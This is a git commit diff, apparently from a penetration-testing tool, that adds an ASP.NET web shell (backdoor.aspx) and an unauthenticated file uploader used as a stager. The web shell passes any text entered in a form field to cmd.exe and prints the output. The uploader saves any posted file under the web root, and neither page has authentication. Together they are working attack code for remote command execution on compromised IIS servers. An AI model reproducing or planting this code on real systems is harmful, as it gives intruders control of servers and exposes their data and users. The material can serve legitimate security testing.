Added ASPX shell and stager

bdamele · bdamele · commit 32067cb676dd · 2009-06-15T14:54:36.000Z
diff --git a/shell/backdoor.aspx b/shell/backdoor.aspx
@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!--    http://michaeldaw.org   04/2007    -->
diff --git a/shell/uploader.aspx b/shell/uploader.aspx
@@ -0,0 +1,23 @@
+<%@ Page Language="vb" AutoEventWireup="false" Codebehind="uploader.aspx.vb" Inherits="VBNetUpload.WebForm1"%>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<HTML>
+  <HEAD>
+    <title>WebForm1</title>
+    <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
+    <meta name="CODE_LANGUAGE" content="Visual Basic 7.0">
+    <meta name=vs_defaultClientScript content="JavaScript">
+    <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
+  </HEAD>
+  <body MS_POSITIONING="GridLayout">
+
+    <form id="Form1" enctype="multipart/form-data" method="post" runat="server">
+
+<INPUT type=file id=File1 name=File1 runat="server" >
+<br>
+<input type="submit" id="Submit1" value="Upload" runat="server" NAME="Submit1">
+
+
+    </form>
+
+  </body>
+</HTML>
diff --git a/shell/uploader.aspx.vb b/shell/uploader.aspx.vb
@@ -0,0 +1,41 @@
+Public Class WebForm1
+    Inherits System.Web.UI.Page
+    Protected WithEvents File1 As System.Web.UI.HtmlControls.HtmlInputFile
+    Protected WithEvents Submit1 As System.Web.UI.HtmlControls.HtmlInputButton
+
+#Region " Web Form Designer Generated Code "
+
+    'This call is required by the Web Form Designer.
+    <System.Diagnostics.DebuggerStepThrough()> Private Sub InitializeComponent()
+
+    End Sub
+
+    Private Sub Page_Init(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Init
+        'CODEGEN: This method call is required by the Web Form Designer
+        'Do not modify it using the code editor.
+        InitializeComponent()
+    End Sub
+
+#End Region
+
+    Private Sub Page_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
+        'Put user code to initialize the page here
+    End Sub
+
+    Private Sub Submit1_ServerClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Submit1.ServerClick
+
+        If Not File1.PostedFile Is Nothing And File1.PostedFile.ContentLength > 0 Then
+            Dim fn As String = System.IO.Path.GetFileName(File1.PostedFile.FileName)
+            Dim SaveLocation as String = Server.MapPath("Data") & "\" & fn
+            Try
+                File1.PostedFile.SaveAs(SaveLocation)
+                Response.Write("The file has been uploaded.")
+            Catch Exc As Exception
+                Response.Write("Error: " & Exc.Message)
+            End Try
+        Else
+            Response.Write("Please select a file to upload.")
+        End If
+
+    End Sub
+End Class
